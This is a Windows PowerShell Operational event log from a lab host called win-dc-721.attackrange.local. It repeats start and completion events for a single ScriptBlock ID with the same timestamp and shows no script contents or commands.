User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468588
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468587
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468586
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468585
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468584
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468583
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468582
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468581
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468580
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468579
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468578
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468577
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468576
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468575
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468574
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468573
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468572
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468571
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468570
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468569
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468568
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468567
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468566
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468565
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468564
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468563
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468562
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468561
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468560
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468559
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468558
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468557
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468556
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468555
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468554
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468553
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468552
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468551
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468550
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468549
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468548
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468547
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468546
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468545
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468544
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468543
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468542
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468541
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468540
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468539
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468538
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468537
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468536
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468535
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468534
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468533
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
